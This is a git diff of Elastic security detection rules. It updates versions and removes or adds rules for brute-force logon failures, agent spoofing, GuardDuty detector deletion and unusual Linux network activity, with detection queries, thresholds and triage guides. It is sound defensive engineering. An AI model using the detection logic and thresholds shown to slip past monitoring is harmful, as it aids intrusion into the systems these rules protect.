--- a/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_111.json +++ b/packages/security_detection_engine/kibana/security_rule/48819484-9826-4083-9eba-1da74cd0eaf2_111.json @@ -31,7 +31,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_112.json b/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_112.json deleted file mode 100644 index 88bc3f1cfd6..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/48b6edfc-079d-4907-b43c-baffa243270d_112.json +++ /dev/null @@ -1,117 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies multiple consecutive logon failures from the same source address and within a short time interval. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Multiple Logon Failure from the same Source Address", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure from the same Source Address\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user names.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity\n\n### False positive analysis\n\n- Understand the context of the authentications by contacting the asset owners. This activity can be related to a new or existing automation or business process that is in a failing state.\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure Followed by Logon Success - 4e85dc8a-3e41-40d8-bc28-91af7ac6cf60\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by winlog.computer_name, source.ip with maxspan=10s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /*\n noisy failure status codes often associated to authentication misconfiguration :\n 0xC000015B - The user has not been granted the requested logon type (also called the logon right) at this machine.\n 0XC000005E\t- There are currently no logon servers available to service the logon request.\n 0XC0000133\t- Clocks between DC and other computer too far out of sync.\n 0XC0000192\tAn attempt was made to logon, but the Netlogon service was not started.\n */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=10\n", - "references": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625", - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4624", - "https://social.technet.microsoft.com/Forums/ie/en-US/c82ac4f3-a235-472c-9fd3-53aa646cfcfd/network-information-missing-in-event-id-4624?forum=winserversecurity", - "https://serverfault.com/questions/379092/remote-desktop-failed-logon-event-4625-not-logging-ip-address-on-2008-terminal-s/403638#403638" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "user.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.Status", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.logon.type", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "48b6edfc-079d-4907-b43c-baffa243270d", - "setup": "## Setup\n\n- In some cases the source network address in Windows events 4625/4624 is not populated due to Microsoft logging limitations (examples in the references links). This edge case will break the rule condition and it won't trigger an alert.\n", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - }, - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - } - ] - } - ], - "type": "eql", - "version": 112 - }, - "id": "48b6edfc-079d-4907-b43c-baffa243270d_112", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json b/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json deleted file mode 100644 index acf3add38a4..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/493834ca-f861-414c-8602-150d5505b777_101.json +++ /dev/null @@ -1,69 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Detects when multiple hosts are using the same agent ID. This could occur in the event of an agent being taken over and used to inject illegitimate documents into an instance as an attempt to spoof events in order to masquerade actual activity to evade detection.", - "false_positives": [ - "This is meant to run only on datasources using Elastic Agent 7.14+ since versions prior to that will be missing the necessary field, resulting in false positives." - ], - "from": "now-9m", - "index": [ - "logs-*", - "metrics-*", - "traces-*" - ], - "language": "kuery", - "license": "Elastic License v2", - "name": "Agent Spoofing - Multiple Hosts Using Same Agent", - "query": "event.agent_id_status:*\n", - "required_fields": [ - { - "ecs": true, - "name": "event.agent_id_status", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "493834ca-f861-414c-8602-150d5505b777", - "severity": "high", - "tags": [ - "Use Case: Threat Detection", - "Tactic: Defense Evasion" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1036", - "name": "Masquerading", - "reference": "https://attack.mitre.org/techniques/T1036/" - } - ] - } - ], - "threshold": { - "cardinality": [ - { - "field": "host.id", - "value": 2 - } - ], - "field": [ - "agent.id" - ], - "value": 2 - }, - "timestamp_override": "event.ingested", - "type": "threshold", - "version": 101 - }, - "id": "493834ca-f861-414c-8602-150d5505b777_101", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_109.json b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_109.json index ce42db95eef..8190583eeb8 100644 --- a/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_109.json +++ b/packages/security_detection_engine/kibana/security_rule/495e5f2e-2480-11ed-bea8-f661ea17fbce_109.json @@ -26,7 +26,7 @@ "related_integrations": [ { "package": "google_workspace", - "version": "^2.31.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_113.json b/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_113.json deleted file mode 100644 index 3bb8c5ad254..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_113.json +++ /dev/null @@ -1,123 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies multiple logon failures followed by a successful one from the same source address. Adversaries will often brute force login attempts across multiple users with a common or known password, in an attempt to gain access to accounts.", - "from": "now-9m", - "index": [ - "logs-system.security*", - "logs-windows.forwarded*", - "winlogbeat-*" - ], - "language": "eql", - "license": "Elastic License v2", - "name": "Multiple Logon Failure Followed by Logon Success", - "note": "## Triage and analysis\n\n### Investigating Multiple Logon Failure Followed by Logon Success\n\nAdversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to guess the password using a repetitive or iterative mechanism systematically. More details can be found [here](https://attack.mitre.org/techniques/T1110/001/).\n\nThis rule identifies potential password guessing/brute force activity from a single address, followed by a successful logon, indicating that an attacker potentially successfully compromised the account.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/current/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the logon failure reason code and the targeted user name.\n - Prioritize the investigation if the account is critical or has administrative privileges over the domain.\n- Investigate the source IP address of the failed Network Logon attempts.\n - Identify whether these attempts are coming from the internet or are internal.\n- Investigate other alerts associated with the involved users and source host during the past 48 hours.\n- Identify the source and the target computer and their roles in the IT environment.\n- Check whether the involved credentials are used in automation or scheduled tasks.\n- If this activity is suspicious, contact the account owner and confirm whether they are aware of it.\n- Examine the source host for derived artifacts that indicate compromise:\n - Observe and collect information about the following activities in the alert source host:\n - Attempts to contact external domains and addresses.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the host which is the source of this activity.\n\n### False positive analysis\n\n- Authentication misconfiguration or obsolete credentials.\n- Service account password expired.\n- Domain trust relationship issues.\n- Infrastructure or availability issues.\n\n### Related rules\n\n- Multiple Logon Failure from the same Source Address - 48b6edfc-079d-4907-b43c-baffa243270d\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the source host to prevent further post-compromise behavior.\n- If the asset is exposed to the internet with RDP or other remote services available, take the necessary measures to restrict access to the asset. If not possible, limit the access via the firewall to only the needed IP addresses. Also, ensure the system uses robust authentication mechanisms and is patched regularly.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", - "query": "sequence by winlog.computer_name, source.ip with maxspan=5s\n [authentication where event.action == \"logon-failed\" and\n /* event 4625 need to be logged */\n winlog.logon.type : \"Network\" and user.id != null and \n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and \n not winlog.event_data.TargetUserSid : \"S-1-0-0\" and not user.id : \"S-1-0-0\" and \n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\" and\n\n /* noisy failure status codes often associated to authentication misconfiguration */\n not winlog.event_data.Status : (\"0xC000015B\", \"0XC000005E\", \"0XC0000133\", \"0XC0000192\")] with runs=5\n [authentication where event.action == \"logged-in\" and\n /* event 4624 need to be logged */\n winlog.logon.type : \"Network\" and\n source.ip != null and source.ip != \"127.0.0.1\" and source.ip != \"::1\" and\n not user.name : (\"ANONYMOUS LOGON\", \"-\", \"*$\") and not user.domain == \"NT AUTHORITY\"]\n", - "references": [ - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4625" - ], - "related_integrations": [ - { - "package": "system", - "version": "^1.6.4" - }, - { - "package": "windows", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "source.ip", - "type": "ip" - }, - { - "ecs": true, - "name": "user.domain", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.id", - "type": "keyword" - }, - { - "ecs": true, - "name": "user.name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.computer_name", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.Status", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.event_data.TargetUserSid", - "type": "keyword" - }, - { - "ecs": false, - "name": "winlog.logon.type", - "type": "unknown" - } - ], - "risk_score": 47, - "rule_id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60", - "severity": "medium", - "tags": [ - "Domain: Endpoint", - "OS: Windows", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Resources: Investigation Guide", - "Data Source: Windows Security Event Logs" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0006", - "name": "Credential Access", - "reference": "https://attack.mitre.org/tactics/TA0006/" - }, - "technique": [ - { - "id": "T1110", - "name": "Brute Force", - "reference": "https://attack.mitre.org/techniques/T1110/", - "subtechnique": [ - { - "id": "T1110.001", - "name": "Password Guessing", - "reference": "https://attack.mitre.org/techniques/T1110/001/" - }, - { - "id": "T1110.003", - "name": "Password Spraying", - "reference": "https://attack.mitre.org/techniques/T1110/003/" - } - ] - } - ] - } - ], - "type": "eql", - "version": 113 - }, - "id": "4e85dc8a-3e41-40d8-bc28-91af7ac6cf60_113", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_210.json b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_210.json index 1f0dad3035c..fb6a7724f83 100644 --- a/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_210.json +++ b/packages/security_detection_engine/kibana/security_rule/514121ce-c7b6-474a-8237-68ff71672379_210.json @@ -23,7 +23,7 @@ "related_integrations": [ { "package": "o365", - "version": "^2.11.0" + "version": "^3.0.0" } ], "required_fields": [ diff --git a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_207.json b/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_207.json deleted file mode 100644 index 004d5f2afd8..00000000000 --- a/packages/security_detection_engine/kibana/security_rule/523116c0-d89d-4d7c-82c2-39e6845a78ef_207.json +++ /dev/null @@ -1,95 +0,0 @@ -{ - "attributes": { - "author": [ - "Elastic" - ], - "description": "Identifies the deletion of an Amazon GuardDuty detector. Upon deletion, GuardDuty stops monitoring the environment and all existing findings are lost.", - "false_positives": [ - "The GuardDuty detector may be deleted by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Detector deletions by unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." - ], - "from": "now-60m", - "index": [ - "filebeat-*", - "logs-aws.cloudtrail-*" - ], - "interval": "10m", - "language": "kuery", - "license": "Elastic License v2", - "name": "AWS GuardDuty Detector Deletion", - "note": "## Triage and analysis\n\n> **Disclaimer**:\n> This investigation guide was created using generative AI technology and has been reviewed to improve its accuracy and relevance. While every effort has been made to ensure its quality, we recommend validating the content and adapting it to suit your specific environment and operational needs.\n\n### Investigating AWS GuardDuty Detector Deletion\n\nAWS GuardDuty is a threat detection service that continuously monitors for malicious activity and unauthorized behavior in AWS environments. Deleting a GuardDuty detector halts this monitoring, potentially concealing malicious actions. Adversaries may exploit this by deleting detectors to evade detection. The detection rule identifies successful deletion events, signaling potential defense evasion attempts, and is crucial for maintaining security visibility.\n\n### Possible investigation steps\n\n- Review the CloudTrail logs for the specific event.provider:guardduty.amazonaws.com and event.action:DeleteDetector to identify the user or role responsible for the deletion.\n- Check the event.outcome:success to confirm the deletion was successful and not an attempted action.\n- Investigate the IAM permissions and recent activity of the user or role identified to determine if the deletion was authorized or potentially malicious.\n- Examine any recent GuardDuty findings prior to the deletion to assess if there were any critical alerts that might have prompted the deletion.\n- Correlate the timing of the detector deletion with other security events or anomalies in the AWS environment to identify potential patterns or coordinated actions.\n- Review AWS CloudTrail logs for any other suspicious activities or changes in the environment around the time of the detector deletion.\n\n### False positive analysis\n\n- Routine maintenance or administrative actions may lead to the deletion of a GuardDuty detector. Verify if the deletion aligns with scheduled maintenance or administrative tasks.\n- Automated scripts or tools used for environment cleanup might inadvertently delete detectors. Review and adjust automation scripts to prevent unintended deletions.\n- Organizational policy changes or restructuring could result in detector deletions. Ensure that policy changes are communicated and understood by all relevant teams to avoid unnecessary deletions.\n- Exclude known and authorized users or roles from triggering alerts by creating exceptions for specific IAM roles or user accounts that are responsible for legitimate detector deletions.\n- Implement logging and alerting for detector deletions to quickly identify and verify the legitimacy of the action, allowing for rapid response to potential false positives.\n\n### Response and remediation\n\n- Immediately re-enable GuardDuty in the affected AWS account to restore monitoring capabilities and ensure continuous threat detection.\n- Conduct a thorough review of CloudTrail logs to identify any unauthorized access or suspicious activities that occurred during the period when GuardDuty was disabled.\n- Isolate any compromised resources identified during the log review to prevent further unauthorized access or damage.\n- Notify the security operations team and relevant stakeholders about the incident for awareness and further investigation.\n- Implement additional access controls and monitoring on the AWS account to prevent unauthorized deletion of GuardDuty detectors in the future.\n- Review and update IAM policies to ensure that only authorized personnel have permissions to delete GuardDuty detectors.\n- Consider enabling AWS Config rules to monitor and alert on changes to GuardDuty configurations for proactive detection of similar incidents.", - "query": "event.dataset:aws.cloudtrail and event.provider:guardduty.amazonaws.com and event.action:DeleteDetector and event.outcome:success\n", - "references": [ - "https://awscli.amazonaws.com/v2/documentation/api/latest/reference/guardduty/delete-detector.html", - "https://docs.aws.amazon.com/guardduty/latest/APIReference/API_DeleteDetector.html" - ], - "related_integrations": [ - { - "integration": "cloudtrail", - "package": "aws", - "version": "^2.0.0" - } - ], - "required_fields": [ - { - "ecs": true, - "name": "event.action", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.dataset", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.outcome", - "type": "keyword" - }, - { - "ecs": true, - "name": "event.provider", - "type": "keyword" - } - ], - "risk_score": 73, - "rule_id": "523116c0-d89d-4d7c-82c2-39e6845a78ef", - "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "severity": "high", - "tags": [ - "Domain: Cloud", - "Data Source: AWS", - "Data Source: Amazon Web Services", - "Tactic: Defense Evasion", - "Resources: Investigation Guide" - ], - "threat": [ - { - "framework": "MITRE ATT&CK", - "tactic": { - "id": "TA0005", - "name": "Defense Evasion", - "reference": "https://attack.mitre.org/tactics/TA0005/" - }, - "technique": [ - { - "id": "T1562", - "name": "Impair Defenses", - "reference": "https://attack.mitre.org/techniques/T1562/", - "subtechnique": [ - { - "id": "T1562.001", - "name": "Disable or Modify Tools", - "reference": "https://attack.mitre.org/techniques/T1562/001/" - } - ] - } - ] - } - ], - "timestamp_override": "event.ingested", - "type": "query", - "version": 207 - }, - "id": "523116c0-d89d-4d7c-82c2-39e6845a78ef_207", - "type": "security-rule" -} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/52afbdc5-db15-485e-bc24-f5707f820c4b_108.json b/packages/security_detection_engine/kibana/security_rule/52afbdc5-db15-485e-bc24-f5707f820c4b_108.json new file mode 100644 index 00000000000..b8ffd28e357 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/52afbdc5-db15-485e-bc24-f5707f820c4b_108.json @@ -0,0 +1,111 @@ +{ + "attributes": { + "anomaly_threshold": 50, + "author": [ + "Elastic" + ], + "description": "Identifies Linux processes that do not usually use the network but have unexpected network activity, which can indicate command-and-control, lateral movement, persistence, or data exfiltration activity. A process with unusual network activity can denote process exploitation or injection, where the process is used to run persistence mechanisms that allow a malicious actor remote access or control of the host, data exfiltration, and execution of unauthorized network applications.", + "from": "now-45m", + "interval": "15m", + "license": "Elastic License v2", + "machine_learning_job_id": [ + "v3_linux_anomalous_network_activity" + ], + "name": "Unusual Linux Network Activity", + "note": "## Triage and analysis\n\n### Investigating Unusual Linux Network Activity\nDetection alerts from this rule indicate the presence of network activity from a Linux process for which network activity is rare and unusual. Here are some possible avenues of investigation:\n- Consider the IP addresses and ports. Are these used by normal but infrequent network workflows? Are they expected or unexpected?\n- If the destination IP address is remote or external, does it associate with an expected domain, organization or geography? Note: avoid interacting directly with suspected malicious IP addresses.\n- Consider the user as identified by the username field. Is this network activity part of an expected workflow for the user who ran the program?\n- Examine the history of execution. If this process only manifested recently, it might be part of a new software package. If it has a consistent cadence (for example if it runs monthly or quarterly), it might be part of a monthly or quarterly business or maintenance process.\n- Examine the process arguments, title and working directory. These may provide indications as to the source of the program or the nature of the tasks it is performing.", + "references": [ + "https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html" + ], + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.18.0" + }, + { + "package": "endpoint", + "version": "^9.0.0" + } + ], + "risk_score": 21, + "rule_id": "52afbdc5-db15-485e-bc24-f5707f820c4b", + "setup": "## Setup\n\nThis rule requires the installation of associated Machine Learning jobs, as well as data coming in from one of the following integrations:\n- Elastic Defend\n- Auditd Manager\n\n### Anomaly Detection Setup\n\nOnce the rule is enabled, the associated Machine Learning job will start automatically. You can view the Machine Learning job linked under the \"Definition\" panel of the detection rule. If the job does not start due to an error, the issue must be resolved for the job to commence successfully. For more details on setting up anomaly detection jobs, refer to the [helper guide](https://www.elastic.co/guide/en/kibana/current/xpack-ml-anomalies.html).\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration to your system:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" to your system:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Rule Type: ML", + "Rule Type: Machine Learning", + "Resources: Investigation Guide" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0008", + "name": "Lateral Movement", + "reference": "https://attack.mitre.org/tactics/TA0008/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1055", + "name": "Process Injection", + "reference": "https://attack.mitre.org/techniques/T1055/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1041", + "name": "Exfiltration Over C2 Channel", + "reference": "https://attack.mitre.org/techniques/T1041/" + } + ] + } + ], + "type": "machine_learning", + "version": 108 + }, + "id": "52afbdc5-db15-485e-bc24-f5707f820c4b_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_210.json b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_210.json new file mode 100644 index 00000000000..f8cf8736b1d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/536997f7-ae73-447d-a12d-bff1e8f5f0a0_210.json @@ -0,0 +1,105 @@ +{ + "attributes": { + "author": [ + "Austin Songer", + "Elastic" + ], + "description": "Identifies the deletion of an Amazon 